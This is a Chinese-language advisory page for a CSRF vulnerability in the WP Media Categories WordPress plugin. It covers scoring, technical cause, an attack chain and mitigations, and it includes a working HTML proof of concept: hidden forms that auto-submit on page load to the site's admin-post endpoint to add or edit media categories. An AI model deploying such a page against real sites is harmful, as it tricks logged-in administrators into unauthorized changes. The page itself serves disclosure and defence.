CVE-2025-60134: WordPress wp-media-categories插件CSRF跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-60134

漏洞类型

CSRF跨站请求伪造

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WP Media Categories (WordPress插件)

漏洞概述

CVE-2025-60134是WordPress插件WP Media Categories中的一个中危跨站请求伪造（CSRF）漏洞。该插件由John James Jacoby开发，主要用于管理WordPress媒体库中的文件分类。漏洞源于插件在处理用户请求时缺乏有效的CSRF令牌验证机制，允许攻击者在用户不知情的情况下诱导其执行非预期的操作。攻击者可以通过构造恶意链接或网页，当认证用户访问时，自动提交未经授权的请求，从而可能修改媒体的分类信息。CVSS评分4.3属于中等严重程度，主要因为漏洞利用需要用户交互，且对机密性和完整性的影响较低。攻击向量为网络层面，无需认证即可发起攻击，但必须依赖受害用户的交互行为。该漏洞影响版本从n/a至2.1.0版本，鉴于WordPress插件的广泛使用，建议用户尽快采取防御措施。

技术细节

该CSRF漏洞存在于WP Media Categories插件的多个管理功能中。攻击者利用WordPress的同源策略和用户会话机制，通过诱导已认证的管理员或用户访问恶意构造的HTML页面来触发攻击。漏洞的技术原理在于：插件在处理媒体分类的添加、修改或删除请求时，未正确实现或验证CSRF令牌（nonce）。WordPress通常通过wp_verify_nonce()函数提供CSRF保护，但该插件的某些操作端点缺少此验证或验证不当。攻击场景包括：攻击者创建一个包含自动提交表单的网页，表单目标指向WordPress管理后台的插件功能接口，通过JavaScript自动提交POST请求。由于浏览器会自动携带目标站点的Cookie，WordPress会认为这是来自合法用户的请求。成功利用后，攻击者可修改媒体文件的分类信息，可能导致网站内容管理混乱或数据完整性问题。防御重点是在所有状态变更操作中添加并验证CSRF令牌，同时实施SameSite Cookie属性。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和WP Media Categories插件版本，确认版本在受影响范围内（<=2.1.0）

STEP 2

步骤2: 构造恶意页面

攻击者创建包含自动提交表单的恶意HTML页面，表单指向WordPress管理接口，模拟合法的媒体分类操作请求

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、恶意链接或被植入恶意代码的网页诱导已登录的管理员或内容编辑者访问恶意页面

STEP 4

步骤4: 自动执行请求

受害者浏览器加载恶意页面后，JavaScript自动提交POST请求，浏览器自动携带目标站点的认证Cookie

STEP 5

步骤5: 漏洞利用

由于插件缺少CSRF令牌验证，WordPress认为请求来自合法用户，执行添加、修改或删除媒体分类的操作

STEP 6

步骤6: 攻击完成

攻击者成功修改媒体分类信息，可能导致网站内容混乱、数据完整性破坏或进一步利用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-60134 -->
<!-- Target: WordPress site with WP Media Categories plugin <= 2.1.0 -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2025-60134</title>
</head>
<body>
    <h1>CSRF PoC for WP Media Categories</h1>
    <p>This PoC demonstrates the CSRF vulnerability in wp-media-categories plugin.</p>
    
    <!-- Auto-submit form to add media category -->
    <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;">
        <input type="hidden" name="action" value="add-media-category">
        <input type="hidden" name="category_name" value="MaliciousCategory">
        <input type="hidden" name="category_slug" value="malicious-category">
        <input type="hidden" name="submit" value="Add Category">
    </form>

    <!-- Alternative: Modify existing media category -->
    <form id="csrfFormModify" action="http://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;">
        <input type="hidden" name="action" value="edit-media-category">
        <input type="hidden" name="category_id" value="1">
        <input type="hidden" name="category_name" value="ModifiedByCSRF">
        <input type="hidden" name="_wpnonce" value=""> <!-- Missing or empty nonce -->
    </form>

    <script>
        // Auto-submit on page load
        document.addEventListener('DOMContentLoaded', function() {
            console.log('CSRF PoC loaded - submitting form...');
            document.getElementById('csrfForm').submit();
            // Or use: document.getElementById('csrfFormModify').submit();
        });
    </script>
    
    <p><strong>Note:</strong> Victim must be logged into WordPress admin panel for attack to succeed.</p>
</body>
</html>

影响范围

WP Media Categories <= 2.1.0

防御指南

临时缓解措施

作为临时缓解措施，可以暂时禁用或删除WP Media Categories插件，直到可用安全更新发布。同时应监控WordPress管理日志，查找异常的媒体分类操作记录。网站管理员应在浏览器中实施严格的安全策略，避免在不受信任的网站上登录WordPress后台，并定期清理浏览器会话。